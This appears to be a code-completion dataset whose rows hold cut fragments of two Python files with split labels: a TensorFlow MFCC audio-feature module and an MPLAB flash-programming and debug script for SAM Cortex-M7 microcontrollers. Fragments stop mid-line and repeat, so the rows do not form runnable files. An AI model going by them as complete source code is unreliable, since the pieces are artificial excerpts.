return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0 | get_label | identifier_name |
|
audio_processing.py |
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds | label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds)) | identifier_body |
|
dap_cortex-m7.py | _sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakopint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
| reset_and_halt() | identifier_body |
|
dap_cortex-m7.py | 5fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if not flash is erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if not flash is erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Converting value to indexing access, and writing one GPNVM bit at the time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def | prog_read | identifier_name |
|
dap_cortex-m7.py |
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 use SYSRESETREQ to reset core + peripherals, will loose connection so need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus use RSTC (PROCRST) to reset peripherals and VECTRESET to reset core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev | was_running = True
halt_or_raise() | conditional_block |
|
dap_cortex-m7.py | ...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakopint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
